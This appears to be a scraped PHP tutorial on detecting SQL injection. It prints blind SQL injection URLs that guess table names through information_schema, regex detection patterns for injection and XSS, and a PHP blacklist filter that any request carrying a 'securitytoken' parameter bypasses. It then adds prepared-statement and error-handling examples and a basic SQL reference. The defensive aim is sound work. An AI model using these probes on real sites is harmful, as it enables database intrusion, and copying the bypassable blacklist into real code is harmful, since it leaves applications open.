Common SQL attacks in PHP: a summary of regular expressions, SQL regular expressions (PHP tutorial)

Source: Internet
Author: User
Tags php regular expression

This article summarizes regular expressions used to detect common SQL injection attacks in PHP and is shared for your reference. The analysis is as follows:

In MySQL 5 and later, all database names and field names are stored in the information_schema database. The attack method is as follows:

1. Determine whether the first character of the first table name is in the range a-z. blind_sqli is a known database name.
Note: in a regular expression, ^[a-z] means that the first character of the string is within the range a-z.

The code is as follows:

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-z]' limit 0,1)/*

2. Determine whether the first character is in the range a-n.

The code is as follows:

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' limit 0,1)/*

3. Confirm that the character is n.

The code is as follows:

index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^n' LIMIT 0,1)/*

4. Extend the expression one character at a time, as follows:

The code is as follows:

'^n[a-z]' -> '^ne[a-z]' -> '^new[a-z]' -> '^news[a-z]' -> FALSE


In this case the table name is news. To verify it, test the regular expression '^news$'; a direct comparison table_name = 'news' is not required.

5. The other tables can then be guessed in the same way; only the limit clause needs to be changed to run the blind injection against the following tables.

For example:

The code is as follows:

$Exec_Commond = "(\s|\S)*(exec(\s|\+)+(s|x)p\w+)(\s|\S)*";
$Simple_XSS = "(\s|\S)*((%3C)|<)((%2F)|/)*[a-z0-9%]+((%3E)|>)(\s|\S)*";
$Eval_XSS = "(\s|\S)*((%65)|e)(\s)*((%76)|v)(\s)*((%61)|a)(\s)*((%6C)|l)(\s|\S)*";
$Image_XSS = "(\s|\S)*((%3C)|<)((%69)|i|I|(%49))((%6D)|m|M|(%4D))((%67)|g|G|(%47))[^\n]+((%3E)|>)(\s|\S)*";
$Script_XSS = "(\s|\S)*((%73)|s)(\s)*((%63)|c)(\s)*((%72)|r)(\s)*((%69)|i)(\s)*((%70)|p)(\s)*((%74)|t)(\s|\S)*";
$SQL_Injection = "(\s|\S)*((%27)|(')|(%3D)|(=)|(/)|(%2F)|(\")|(%22)|(-|%2D){2}|(%23)|(%3B)|(;))+(\s|\S)*";

SQL attack code:

The code is as follows:

<?php
// Custom error handler: print the error location and stop
function customError($errno, $errstr, $errfile, $errline)
{
    echo "Error number: [$errno], error on line $errline in $errfile\n";
    die();
}
set_error_handler("customError", E_ERROR);

// Patterns applied to GET, POST and COOKIE values respectively
$getfilter = "'|(and|or)\b.+?(>|<|=|in|like)|\/\*.+?\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)";
$postfilter = "\b(and|or)\b.{1,6}?(=|>|<|\bin\b|\blike\b)|\/\*.+?\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)";
$cookiefilter = "\b(and|or)\b.{1,6}?(=|>|<|\bin\b|\blike\b)|\/\*.+?\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)";

// Log and abort the request when the value matches the filter pattern
function StopAttack($StrFiltKey, $StrFiltValue, $ArrFiltReq)
{
    if (is_array($StrFiltValue)) {
        $StrFiltValue = implode($StrFiltValue);
    }
    // A request carrying a securitytoken parameter is not checked
    if (preg_match("/" . $ArrFiltReq . "/is", $StrFiltValue) == 1 && !isset($_REQUEST['securitytoken'])) {
        slog("\nOperation IP address: " . $_SERVER["REMOTE_ADDR"] .
             "\nOperation time: " . strftime("%Y-%m-%d %H:%M:%S") .
             "\nOperation page: " . $_SERVER["PHP_SELF"] .
             "\nSubmission method: " . $_SERVER["REQUEST_METHOD"] .
             "\nParameter submitted: " . $StrFiltKey .
             "\nSubmitted data: " . $StrFiltValue);
        print "Result notice: Illegal operation!";
        exit();
    }
}

foreach ($_GET as $key => $value) {
    StopAttack($key, $value, $getfilter);
}
foreach ($_POST as $key => $value) {
    StopAttack($key, $value, $postfilter);
}
foreach ($_COOKIE as $key => $value) {
    StopAttack($key, $value, $cookiefilter);
}

// Append one entry to the log file
function slog($logs)
{
    $toppath = "log.htm";
    $ts = fopen($toppath, "a+");
    fputs($ts, $logs . "\r\n");
    fclose($ts);
}
?>
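As an added example that is not part of the original article, the following runs the article's $getfilter pattern over a few constructed inputs, including the REGEXP probe from the blind-injection steps above, to show what the blacklist flags and which legitimate values it blocks as well, and then shows the prepared-statement lookup that removes the need for such a blacklist. The news table, findById() and the open $pdo connection are assumptions of this example.

```php
<?php
// Added example: exercise the article's $getfilter pattern, then show the
// parameterised query that makes the blacklist unnecessary.
$getfilter = '\'|(and|or)\b.+?(>|<|=|in|like)|\/\*.+?\*\/|<\s*script\b|\bEXEC\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\s+(TABLE|DATABASE)';

// Same call as the article's StopAttack(): case-insensitive, dot matches newline.
function isFlagged(string $value, string $filter): bool
{
    return preg_match("/" . $filter . "/is", $value) === 1;
}

// Constructed samples: the article's probe, two harmless values, a plain id.
$samples = [
    "1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA=\"blind_sqli\" AND table_name REGEXP '^[a-z]' limit 0,1)/*",
    "please select a book from the catalogue",   // legitimate text, still flagged by (SELECT|DELETE).+?FROM
    "O'Brien",                                    // legitimate surname, flagged by the leading '
    "42",                                         // allowed
];
foreach ($samples as $s) {
    printf("%-8s %s\n", isFlagged($s, $getfilter) ? 'BLOCKED' : 'allowed', $s);
}

// The durable mitigation: never concatenate user input into SQL. A hypothetical
// lookup against the article's news table, using a PDO prepared statement.
// $pdo is assumed to be an already opened PDO connection.
function findById(PDO $pdo, string $rawId): ?array
{
    $stmt = $pdo->prepare('SELECT id, title FROM news WHERE id = :id');
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT); // id is typed, not spliced
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}
```

With the blacklist, the two legitimate values are rejected while any query shape the pattern does not anticipate passes; with findById() the input can only ever be an integer parameter.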


SQL analysis:

Once set_error_handler() is in use, PHP's standard error handling is bypassed for the covered error types, so the custom handler must itself decide how to end the script (here with die()).
Second, an error that occurs before the handler is registered is not routed to it, so the user-defined handler cannot cover that error.

In PHP, set_error_handler() lets you handle PHP errors yourself, and trigger_error() lets you raise an error of your own.

set_error_handler() registers a custom error handling function, which is how a script defines its own error handling at run time. Create the handler function first, then register it together with the error levels it should receive.
Usage:

The code is as follows:

function customError($errno, $errstr, $errfile, $errline)
{
    echo "Error code: [{$errno}] {$errstr}\r\n";
    echo "Error line: {$errline} in file {$errfile}\r\n";
    echo "PHP version ", PHP_VERSION, " (", PHP_OS, ")\r\n";
    // die();
}
set_error_handler("customError", E_ALL | E_STRICT);

Summary

When PHP encounters an error, it reports the location of the script, the line number, and the cause. Many people say this is no big deal, but the consequences of leaking the real path can be severe: for an intruder this information is very valuable, and in practice many servers have this problem. Some administrators simply set display_errors to Off in the PHP configuration file, but that approach is too blunt: sometimes we do need PHP to return an error message for debugging, and when an error occurs we may want to give the user an explanation or even redirect to another page. set_error_handler() resolves these conflicting needs, yet it is rarely used.
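An added example, not from the original article, of the approach the summary recommends: a handler registered with set_error_handler() that writes the file path and line number only to the server log and shows the client a generic message with a correlation reference. safeErrorHandler() and the reference format are this example's own, and error_log() is assumed to be configured to a server-side log file.

```php
<?php
// Added example: keep file paths and line numbers out of HTTP responses while
// still recording them for debugging. error_log() is assumed to write to a
// server-side log configured in php.ini.
declare(strict_types=1);

function safeErrorHandler(int $errno, string $errstr, string $errfile, int $errline): bool
{
    // Short random reference that ties the user-visible message to the log line.
    $ref = bin2hex(random_bytes(4));

    // Full detail, including the real path, goes only to the server-side log.
    error_log(sprintf('[ref %s] errno=%d %s in %s:%d', $ref, $errno, $errstr, $errfile, $errline));

    if ($errno === E_USER_ERROR) {
        // Unrecoverable: a fixed message plus the reference, never the path.
        http_response_code(500);
        echo "Something went wrong. Reference: $ref";
        exit(1);
    }
    // Warnings and notices are logged and suppressed: returning true stops
    // PHP's default output, which would otherwise include the path.
    return true;
}

set_error_handler('safeErrorHandler', E_ALL);
ini_set('display_errors', '0'); // defence in depth for errors the handler cannot intercept

// Usage: a warning that is only logged, then an application error that ends the request.
trigger_error('cache backend unreachable, falling back to database', E_USER_WARNING);
trigger_error('required configuration value missing', E_USER_ERROR);
```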

I hope this article will help you with PHP programming.


Parsing SQL with a PHP regular expression

$sql = '
create table if not exists uploadtype (
  id int(11) not null AUTO_INCREMENT,
  title varchar(20) DEFAULT \'0\',
  sydefault char(1) DEFAULT \'0\',
  primary key (id)
) ENGINE=MyISAM
';
// i: case-insensitive, s: dot matches newline, U: ungreedy quantifiers
preg_match('#create table.*\(.*\)\s*ENGINE=MyISAM#isU', $sql, $typefile);
var_dump($typefile);

Common symbols of SQL regular expressions

SQL classification:
DDL - Data Definition Language (CREATE, ALTER, DROP, DECLARE)
DML - Data Manipulation Language (SELECT, DELETE, UPDATE, INSERT)
DCL - Data Control Language (GRANT, REVOKE, COMMIT, ROLLBACK)

First, a brief introduction to the basic statements:
1. Description: create a database
create database database-name
2. Description: delete a database
drop database dbname
3. Description: back up SQL Server
--- create a device for the backup data
USE master
EXEC sp_addumpdevice 'disk', 'testback', 'c:\mssql7backup\MyNwind_1.dat'
--- start the backup
BACKUP DATABASE pubs TO testBack
4. Description: create a new table
create table tabname (col1 type1 [not null] [primary key], col2 type2 [not null], ...)
Create a new table based on an existing table:
A: create table tab_new like tab_old (use the old table to create the new table)
B: create table tab_new as select col1, col2 ... from tab_old definition only
5. Description: delete a table
drop table tabname
6. Description: add a column
alter table tabname add column col type
Note: columns cannot be deleted after they are added. In DB2 the data type of an added column cannot be changed either; the only permitted change is to increase the length of a varchar column.
7. Description: add a primary key: alter table tabname add primary key (col)
Delete a primary key: alter table tabname drop primary key (col)
8. Description: create an index: create [unique] index idxname on tabname (col ....)
Delete an index: drop index idxname
Note: an index cannot be changed. To change it, delete it and recreate it.
9. Description: create a view: create view viewname as select statement
Delete a view: drop view viewname
10. Description: several simple basic SQL statements
Select: select * from table1 where range
Insert: insert into table1 (field1, field2) values (value1, value2)
Delete: delete from table1 where range
Update: update table1 set field1 = value1 where range
Search: select * from table1 where field1 like '%value1%' --- the like syntax is subtle; look it up!
Sort: select * from table1 order by field1, field2 [desc]
Total: select count(*) as totalcount from table1
Sum: select sum(field1) as sumvalue from table1
Average: select avg(field1) as avgvalue from table1
Maximum ......